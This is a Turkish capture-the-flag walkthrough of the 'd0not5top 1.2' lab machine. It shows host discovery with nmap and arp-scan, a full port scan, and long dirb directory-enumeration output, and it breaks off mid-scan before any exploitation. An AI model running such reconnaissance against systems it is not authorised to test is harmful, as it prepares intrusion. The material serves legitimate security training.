Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Login

Register Now

Canyoupwn.me ~

TR | d0not5top: 1.2 Walkthrough

Seviyesi zor olarak belirlenmiş bir makina. Beni de bayağı zorladı 🙂 Bazı yerlerde ip değişikliğinin olması, makinayı uzun sürede başka ağlara bağlanıp çözmemden dolayı.


Makinamızın ip adresini öğrenmek için sudo nmap 172.189.64.0/24  komutunu veriyorum. Ağımda fazla cihaz olsaydı netdiscover veya arp taraması kullanabilirdim. Örneğin ortak bir ağda çalıştığımda nmap çalıştırmak uzun süreceği için sudo arp-scan 172.189.64.0/24 komutu ile tarama yaptım.


sudo nmap -sS -sV 192.168.1.22 -p- -A komutuyla makinamın açık portlarını taratıyorum.

80 Portunda çalışan http servisini incelemek için dirb http://192.168.1.22  komutu ile sitede 200 dönen istekleri inceliyorum.

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri May 12 12:40:20 2017
URL_BASE: http://192.168.1.22/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.22/ ----
==> DIRECTORY: http://192.168.1.22/archive/                                    
==> DIRECTORY: http://192.168.1.22/blog/                                       
==> DIRECTORY: http://192.168.1.22/contact/                                    
==> DIRECTORY: http://192.168.1.22/control/                                    
==> DIRECTORY: http://192.168.1.22/feed/                                       
==> DIRECTORY: http://192.168.1.22/games/                                      
+ http://192.168.1.22/index.html (CODE:200|SIZE:211)                           
==> DIRECTORY: http://192.168.1.22/manual/                                     
==> DIRECTORY: http://192.168.1.22/mint/                                       
==> DIRECTORY: http://192.168.1.22/phpmyadmin/                                 
==> DIRECTORY: http://192.168.1.22/plugins/                                    
+ http://192.168.1.22/robots.txt (CODE:200|SIZE:695)                           
==> DIRECTORY: http://192.168.1.22/search/                                     
+ http://192.168.1.22/server-status (CODE:403|SIZE:222)                        
==> DIRECTORY: http://192.168.1.22/support/                                    
==> DIRECTORY: http://192.168.1.22/tag/                                        
==> DIRECTORY: http://192.168.1.22/themes/                                     
==> DIRECTORY: http://192.168.1.22/trackback/                                  
==> DIRECTORY: http://192.168.1.22/wp-admin/                                   
==> DIRECTORY: http://192.168.1.22/wp-content/                                 
==> DIRECTORY: http://192.168.1.22/wp-includes/                                
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/                                 
                                                                               
---- Entering directory: http://192.168.1.22/archive/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/                              
+ http://192.168.1.22/archive/index.php (CODE:200|SIZE:0)                      
                                                                               
---- Entering directory: http://192.168.1.22/blog/ ----
==> DIRECTORY: http://192.168.1.22/blog/admin/                                 
+ http://192.168.1.22/blog/index.php (CODE:200|SIZE:0)                         
                                                                               
---- Entering directory: http://192.168.1.22/contact/ ----
==> DIRECTORY: http://192.168.1.22/contact/admin/                              
+ http://192.168.1.22/contact/index.php (CODE:200|SIZE:0)                      
                                                                               
---- Entering directory: http://192.168.1.22/control/ ----
==> DIRECTORY: http://192.168.1.22/control/css/                                
==> DIRECTORY: http://192.168.1.22/control/fonts/                              
+ http://192.168.1.22/control/index.html (CODE:200|SIZE:6814)                  
==> DIRECTORY: http://192.168.1.22/control/js/                                 
+ http://192.168.1.22/control/LICENSE (CODE:200|SIZE:11336)                    
                                                                               
---- Entering directory: http://192.168.1.22/feed/ ----
==> DIRECTORY: http://192.168.1.22/feed/admin/                                 
+ http://192.168.1.22/feed/index.php (CODE:200|SIZE:0)                         
                                                                               
---- Entering directory: http://192.168.1.22/games/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/manual/ ----
==> DIRECTORY: http://192.168.1.22/manual/da/                                  
==> DIRECTORY: http://192.168.1.22/manual/de/                                  
==> DIRECTORY: http://192.168.1.22/manual/en/                                  
==> DIRECTORY: http://192.168.1.22/manual/es/                                  
==> DIRECTORY: http://192.168.1.22/manual/fr/                                  
==> DIRECTORY: http://192.168.1.22/manual/images/                              
+ http://192.168.1.22/manual/index.html (CODE:200|SIZE:626)                    
==> DIRECTORY: http://192.168.1.22/manual/ja/                                  
==> DIRECTORY: http://192.168.1.22/manual/ko/                                  
==> DIRECTORY: http://192.168.1.22/manual/style/                               
==> DIRECTORY: http://192.168.1.22/manual/tr/                                  
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/                               
                                                                               
---- Entering directory: http://192.168.1.22/mint/ ----
==> DIRECTORY: http://192.168.1.22/mint/admin/                                 
+ http://192.168.1.22/mint/index.php (CODE:200|SIZE:0)                         
                                                                               
---- Entering directory: http://192.168.1.22/phpmyadmin/ ----
+ http://192.168.1.22/phpmyadmin/index.html (CODE:200|SIZE:154472)             
                                                                               
---- Entering directory: http://192.168.1.22/plugins/ ----
==> DIRECTORY: http://192.168.1.22/plugins/admin/                              
+ http://192.168.1.22/plugins/index.php (CODE:200|SIZE:0)                      
                                                                               
---- Entering directory: http://192.168.1.22/search/ ----
==> DIRECTORY: http://192.168.1.22/search/admin/                               
+ http://192.168.1.22/search/index.php (CODE:200|SIZE:0)                       
                                                                               
---- Entering directory: http://192.168.1.22/support/ ----
==> DIRECTORY: http://192.168.1.22/support/admin/                              
+ http://192.168.1.22/support/index.php (CODE:200|SIZE:0)                      
                                                                               
---- Entering directory: http://192.168.1.22/tag/ ----
==> DIRECTORY: http://192.168.1.22/tag/admin/                                  
+ http://192.168.1.22/tag/index.php (CODE:200|SIZE:0)                          
                                                                               
---- Entering directory: http://192.168.1.22/themes/ ----
==> DIRECTORY: http://192.168.1.22/themes/admin/                               
+ http://192.168.1.22/themes/index.php (CODE:200|SIZE:0)                       
                                                                               
---- Entering directory: http://192.168.1.22/trackback/ ----
==> DIRECTORY: http://192.168.1.22/trackback/admin/                            
+ http://192.168.1.22/trackback/index.php (CODE:200|SIZE:0)                    
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/ ----
==> DIRECTORY: http://192.168.1.22/wp-admin/admin/                             
+ http://192.168.1.22/wp-admin/index.php (CODE:200|SIZE:0)                     
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/ ----
==> DIRECTORY: http://192.168.1.22/wp-content/admin/                           
+ http://192.168.1.22/wp-content/index.php (CODE:200|SIZE:0)                   
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/ ----
==> DIRECTORY: http://192.168.1.22/wp-includes/admin/                          
+ http://192.168.1.22/wp-includes/index.php (CODE:200|SIZE:0)                  
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/ ----
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/admin/                           
+ http://192.168.1.22/xmlrpc.php/index.php (CODE:200|SIZE:0)                   
                                                                               
---- Entering directory: http://192.168.1.22/archive/admin/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/archive/                      
+ http://192.168.1.22/archive/admin/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.1.22/blog/admin/ ----
==> DIRECTORY: http://192.168.1.22/blog/admin/blog/                            
+ http://192.168.1.22/blog/admin/index.php (CODE:200|SIZE:0)                   
                                                                               
---- Entering directory: http://192.168.1.22/contact/admin/ ----
==> DIRECTORY: http://192.168.1.22/contact/admin/contact/                      
+ http://192.168.1.22/contact/admin/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.1.22/control/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/control/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/control/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/feed/admin/ ----
==> DIRECTORY: http://192.168.1.22/feed/admin/feed/                            
+ http://192.168.1.22/feed/admin/index.php (CODE:200|SIZE:0)                   
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/ ----
==> DIRECTORY: http://192.168.1.22/manual/da/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/da/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/da/howto/                            
+ http://192.168.1.22/manual/da/index.html (CODE:200|SIZE:9041)                
==> DIRECTORY: http://192.168.1.22/manual/da/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/da/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/da/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/da/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/ ----
==> DIRECTORY: http://192.168.1.22/manual/de/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/de/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/de/howto/                            
+ http://192.168.1.22/manual/de/index.html (CODE:200|SIZE:9290)                
==> DIRECTORY: http://192.168.1.22/manual/de/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/de/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/de/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/de/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/ ----
==> DIRECTORY: http://192.168.1.22/manual/en/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/en/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/en/howto/                            
+ http://192.168.1.22/manual/en/index.html (CODE:200|SIZE:9206)                
==> DIRECTORY: http://192.168.1.22/manual/en/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/en/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/en/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/en/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/ ----
==> DIRECTORY: http://192.168.1.22/manual/es/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/es/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/es/howto/                            
+ http://192.168.1.22/manual/es/index.html (CODE:200|SIZE:9255)                
==> DIRECTORY: http://192.168.1.22/manual/es/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/es/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/es/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/es/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/ ----
==> DIRECTORY: http://192.168.1.22/manual/fr/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/fr/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/fr/howto/                            
+ http://192.168.1.22/manual/fr/index.html (CODE:200|SIZE:9479)                
==> DIRECTORY: http://192.168.1.22/manual/fr/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/fr/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/fr/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/fr/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/ ----
==> DIRECTORY: http://192.168.1.22/manual/ja/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/ja/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/ja/howto/                            
+ http://192.168.1.22/manual/ja/index.html (CODE:200|SIZE:9649)                
==> DIRECTORY: http://192.168.1.22/manual/ja/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/ja/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/ja/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/ja/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/ ----
==> DIRECTORY: http://192.168.1.22/manual/ko/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/ko/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/ko/howto/                            
+ http://192.168.1.22/manual/ko/index.html (CODE:200|SIZE:8513)                
==> DIRECTORY: http://192.168.1.22/manual/ko/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/ko/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/ko/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/ko/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/ ----
==> DIRECTORY: http://192.168.1.22/manual/tr/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/tr/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/tr/howto/                            
+ http://192.168.1.22/manual/tr/index.html (CODE:200|SIZE:9416)                
==> DIRECTORY: http://192.168.1.22/manual/tr/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/tr/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/tr/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/tr/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/ ----
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/developer/                     
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/faq/                           
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/howto/                         
+ http://192.168.1.22/manual/zh-cn/index.html (CODE:200|SIZE:8884)             
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/misc/                          
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/mod/                           
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/programs/                      
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/ssl/                           
                                                                               
---- Entering directory: http://192.168.1.22/mint/admin/ ----
+ http://192.168.1.22/mint/admin/index.php (CODE:200|SIZE:0)                   
==> DIRECTORY: http://192.168.1.22/mint/admin/mint/                            
                                                                               
---- Entering directory: http://192.168.1.22/plugins/admin/ ----
+ http://192.168.1.22/plugins/admin/index.php (CODE:200|SIZE:0)                
==> DIRECTORY: http://192.168.1.22/plugins/admin/plugins/                      
                                                                               
---- Entering directory: http://192.168.1.22/search/admin/ ----
+ http://192.168.1.22/search/admin/index.php (CODE:200|SIZE:0)                 
==> DIRECTORY: http://192.168.1.22/search/admin/search/                        
                                                                               
---- Entering directory: http://192.168.1.22/support/admin/ ----
+ http://192.168.1.22/support/admin/index.php (CODE:200|SIZE:0)                
==> DIRECTORY: http://192.168.1.22/support/admin/support/                      
                                                                               
---- Entering directory: http://192.168.1.22/tag/admin/ ----
+ http://192.168.1.22/tag/admin/index.php (CODE:200|SIZE:0)                    
==> DIRECTORY: http://192.168.1.22/tag/admin/tag/                              
                                                                               
---- Entering directory: http://192.168.1.22/themes/admin/ ----
+ http://192.168.1.22/themes/admin/index.php (CODE:200|SIZE:0)                 
==> DIRECTORY: http://192.168.1.22/themes/admin/themes/                        
                                                                               
---- Entering directory: http://192.168.1.22/trackback/admin/ ----
+ http://192.168.1.22/trackback/admin/index.php (CODE:200|SIZE:0)              
==> DIRECTORY: http://192.168.1.22/trackback/admin/trackback/                  
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/admin/ ----
+ http://192.168.1.22/wp-admin/admin/index.php (CODE:200|SIZE:0)               
==> DIRECTORY: http://192.168.1.22/wp-admin/admin/wp-admin/                    
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/admin/ ----
+ http://192.168.1.22/wp-content/admin/index.php (CODE:200|SIZE:0)             
==> DIRECTORY: http://192.168.1.22/wp-content/admin/wp-content/                
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/admin/ ----
+ http://192.168.1.22/wp-includes/admin/index.php (CODE:200|SIZE:0)            
==> DIRECTORY: http://192.168.1.22/wp-includes/admin/wp-includes/              
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/admin/ ----
+ http://192.168.1.22/xmlrpc.php/admin/index.php (CODE:200|SIZE:0)             
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/                
                                                                               
---- Entering directory: http://192.168.1.22/archive/admin/archive/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/archive/1/                    
+ http://192.168.1.22/archive/admin/archive/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/blog/admin/blog/ ----
==> DIRECTORY: http://192.168.1.22/blog/admin/blog/1/                          
+ http://192.168.1.22/blog/admin/blog/index.php (CODE:200|SIZE:0)              
                                                                               
---- Entering directory: http://192.168.1.22/contact/admin/contact/ ----
==> DIRECTORY: http://192.168.1.22/contact/admin/contact/1/                    
+ http://192.168.1.22/contact/admin/contact/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/feed/admin/feed/ ----
==> DIRECTORY: http://192.168.1.22/feed/admin/feed/1/                          
+ http://192.168.1.22/feed/admin/feed/index.php (CODE:200|SIZE:0)              
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/developer/ ----
+ http://192.168.1.22/manual/da/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/faq/ ----
+ http://192.168.1.22/manual/da/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/howto/ ----
+ http://192.168.1.22/manual/da/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/misc/ ----
+ http://192.168.1.22/manual/da/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/mod/ ----
+ http://192.168.1.22/manual/da/mod/index.html (CODE:200|SIZE:22377)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/programs/ ----
+ http://192.168.1.22/manual/da/programs/index.html (CODE:200|SIZE:6897)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/ssl/ ----
+ http://192.168.1.22/manual/da/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/developer/ ----
+ http://192.168.1.22/manual/de/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/faq/ ----
+ http://192.168.1.22/manual/de/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/howto/ ----
+ http://192.168.1.22/manual/de/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/misc/ ----
+ http://192.168.1.22/manual/de/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/mod/ ----
+ http://192.168.1.22/manual/de/mod/index.html (CODE:200|SIZE:22569)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/programs/ ----
+ http://192.168.1.22/manual/de/programs/index.html (CODE:200|SIZE:6897)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/ssl/ ----
+ http://192.168.1.22/manual/de/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/developer/ ----
+ http://192.168.1.22/manual/en/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/faq/ ----
+ http://192.168.1.22/manual/en/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/howto/ ----
+ http://192.168.1.22/manual/en/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/misc/ ----
+ http://192.168.1.22/manual/en/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/mod/ ----
+ http://192.168.1.22/manual/en/mod/index.html (CODE:200|SIZE:22377)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/programs/ ----
+ http://192.168.1.22/manual/en/programs/index.html (CODE:200|SIZE:6897)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/ssl/ ----
+ http://192.168.1.22/manual/en/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/developer/ ----
+ http://192.168.1.22/manual/es/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/faq/ ----
+ http://192.168.1.22/manual/es/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/howto/ ----
+ http://192.168.1.22/manual/es/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/misc/ ----
+ http://192.168.1.22/manual/es/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/mod/ ----
+ http://192.168.1.22/manual/es/mod/index.html (CODE:200|SIZE:22752)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/programs/ ----
+ http://192.168.1.22/manual/es/programs/index.html (CODE:200|SIZE:6298)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/ssl/ ----
+ http://192.168.1.22/manual/es/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/developer/ ----
+ http://192.168.1.22/manual/fr/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/faq/ ----
+ http://192.168.1.22/manual/fr/faq/index.html (CODE:200|SIZE:3604)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/howto/ ----
+ http://192.168.1.22/manual/fr/howto/index.html (CODE:200|SIZE:7136)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/misc/ ----
+ http://192.168.1.22/manual/fr/misc/index.html (CODE:200|SIZE:5407)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/mod/ ----
+ http://192.168.1.22/manual/fr/mod/index.html (CODE:200|SIZE:24329)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/programs/ ----
+ http://192.168.1.22/manual/fr/programs/index.html (CODE:200|SIZE:7185)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/ssl/ ----
+ http://192.168.1.22/manual/fr/ssl/index.html (CODE:200|SIZE:5191)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/developer/ ----
+ http://192.168.1.22/manual/ja/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/faq/ ----
+ http://192.168.1.22/manual/ja/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/howto/ ----
+ http://192.168.1.22/manual/ja/howto/index.html (CODE:200|SIZE:7723)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/misc/ ----
+ http://192.168.1.22/manual/ja/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/mod/ ----
+ http://192.168.1.22/manual/ja/mod/index.html (CODE:200|SIZE:23684)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/programs/ ----
+ http://192.168.1.22/manual/ja/programs/index.html (CODE:200|SIZE:6897)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/ssl/ ----
+ http://192.168.1.22/manual/ja/ssl/index.html (CODE:200|SIZE:5274)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/developer/ ----
+ http://192.168.1.22/manual/ko/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/faq/ ----
+ http://192.168.1.22/manual/ko/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/howto/ ----
+ http://192.168.1.22/manual/ko/howto/index.html (CODE:200|SIZE:6373)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/misc/ ----
+ http://192.168.1.22/manual/ko/misc/index.html (CODE:200|SIZE:5197)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/mod/ ----
+ http://192.168.1.22/manual/ko/mod/index.html (CODE:200|SIZE:21813)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/programs/ ----
+ http://192.168.1.22/manual/ko/programs/index.html (CODE:200|SIZE:5773)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/ssl/ ----
+ http://192.168.1.22/manual/ko/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/developer/ ----
+ http://192.168.1.22/manual/tr/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/faq/ ----
+ http://192.168.1.22/manual/tr/faq/index.html (CODE:200|SIZE:3612)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/howto/ ----
+ http://192.168.1.22/manual/tr/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/misc/ ----
+ http://192.168.1.22/manual/tr/misc/index.html (CODE:200|SIZE:5339)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/mod/ ----
+ http://192.168.1.22/manual/tr/mod/index.html (CODE:200|SIZE:22660)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/programs/ ----
+ http://192.168.1.22/manual/tr/programs/index.html (CODE:200|SIZE:7405)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/ssl/ ----
+ http://192.168.1.22/manual/tr/ssl/index.html (CODE:200|SIZE:5196)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/developer/ ----
+ http://192.168.1.22/manual/zh-cn/developer/index.html (CODE:200|SIZE:5995)   
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/faq/ ----
+ http://192.168.1.22/manual/zh-cn/faq/index.html (CODE:200|SIZE:3571)         
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/howto/ ----
+ http://192.168.1.22/manual/zh-cn/howto/index.html (CODE:200|SIZE:6566)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/misc/ ----
+ http://192.168.1.22/manual/zh-cn/misc/index.html (CODE:200|SIZE:4807)        
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/mod/ ----
+ http://192.168.1.22/manual/zh-cn/mod/index.html (CODE:200|SIZE:22261)        
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/programs/ ----
+ http://192.168.1.22/manual/zh-cn/programs/index.html (CODE:200|SIZE:6833)    
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/ssl/ ----
+ http://192.168.1.22/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042)         
                                                                               
---- Entering directory: http://192.168.1.22/mint/admin/mint/ ----
==> DIRECTORY: http://192.168.1.22/mint/admin/mint/1/                          
+ http://192.168.1.22/mint/admin/mint/index.php (CODE:200|SIZE:0)              
                                                                               
---- Entering directory: http://192.168.1.22/plugins/admin/plugins/ ----
==> DIRECTORY: http://192.168.1.22/plugins/admin/plugins/1/                    
+ http://192.168.1.22/plugins/admin/plugins/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/search/admin/search/ ----
==> DIRECTORY: http://192.168.1.22/search/admin/search/1/                      
+ http://192.168.1.22/search/admin/search/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/support/admin/support/ ----
==> DIRECTORY: http://192.168.1.22/support/admin/support/1/                    
+ http://192.168.1.22/support/admin/support/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/tag/admin/tag/ ----
==> DIRECTORY: http://192.168.1.22/tag/admin/tag/1/                            
+ http://192.168.1.22/tag/admin/tag/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.1.22/themes/admin/themes/ ----
==> DIRECTORY: http://192.168.1.22/themes/admin/themes/1/                      
+ http://192.168.1.22/themes/admin/themes/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/trackback/admin/trackback/ ----
==> DIRECTORY: http://192.168.1.22/trackback/admin/trackback/1/                
+ http://192.168.1.22/trackback/admin/trackback/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/admin/wp-admin/ ----
==> DIRECTORY: http://192.168.1.22/wp-admin/admin/wp-admin/1/                  
+ http://192.168.1.22/wp-admin/admin/wp-admin/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/admin/wp-content/ ----
==> DIRECTORY: http://192.168.1.22/wp-content/admin/wp-content/1/              
+ http://192.168.1.22/wp-content/admin/wp-content/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/admin/wp-includes/ ----
==> DIRECTORY: http://192.168.1.22/wp-includes/admin/wp-includes/1/            
+ http://192.168.1.22/wp-includes/admin/wp-includes/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/ ----
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/              
+ http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.1.22/archive/admin/archive/1/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/archive/1/2/                  
+ http://192.168.1.22/archive/admin/archive/1/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/blog/admin/blog/1/ ----
==> DIRECTORY: http://192.168.1.22/blog/admin/blog/1/2/                        
